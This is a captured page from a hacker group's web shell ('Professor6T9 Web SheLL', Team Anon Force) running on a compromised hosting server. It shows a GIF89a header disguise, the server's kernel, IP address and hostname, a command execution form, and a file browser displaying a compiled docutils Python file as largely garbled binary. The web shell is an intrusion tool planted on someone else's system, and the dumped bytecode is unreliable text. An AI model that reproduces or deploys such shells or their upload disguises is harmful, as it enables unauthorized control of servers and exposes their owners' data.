GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
proc
/
self
/
root
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
docutils
/
utils
/
math
/
__pycache__
[ HOME ]
Exec
Submit
__init__.cpython-311.pyc
� ��i! � � � d Z d� Zdd�ZdS )a� This is the Docutils (Python Documentation Utilities) "math" sub-package. It contains various modules for conversion between different math formats (LaTeX, MathML, HTML). :math2html: LaTeX math -> HTML conversion from eLyXer :latex2mathml: LaTeX math -> presentational MathML :unichar2tex: Unicode character to LaTeX math translation table :tex2unichar: LaTeX math to Unicode character translation dictionaries :tex2mathml_extern: Wrapper for 3rd party TeX -> MathML converters c �j � | � d� � }d� d� |D � � � � S )zAReturn string (LaTeX math) `code` with environments stripped out.z\begin{c 3 �L K � | ]}|� d � � d V � � dS )z\end{���N)�split)�.0�chunks �|/builddir/build/BUILD/imunify360-venv-2.6.1/opt/imunify360/venv/lib/python3.11/site-packages/docutils/utils/math/__init__.py� <genexpr>z toplevel_code.<locals>.<genexpr> sG � � � � 0� 0�$� !�;�;�x�0�0��4� 0� 0� 0� 0� 0� 0� )r �join)�code�chunkss r � toplevel_coder sE � � �Z�Z� � #� #�F��?�?� 0� 0�(.�0� 0� 0� 0� 0� 0r Fc �j � t | � � � d� � dk rd}nd}|s|dz }|S )a: Return the right math environment to display `code`. The test simply looks for line-breaks (``\``) outside environments. Multi-line formulae are set with ``align``, one-liners with ``equation``. If `numbered` evaluates to ``False``, the "starred" versions are used to suppress numbering. z\\� �align�equation�*)r �find)r �numbered�envs r �pick_math_environmentr $ sG � � �T������&�&�!�+�+������� ��s� ���Jr N)F)�__doc__r r � r r �<module>r s<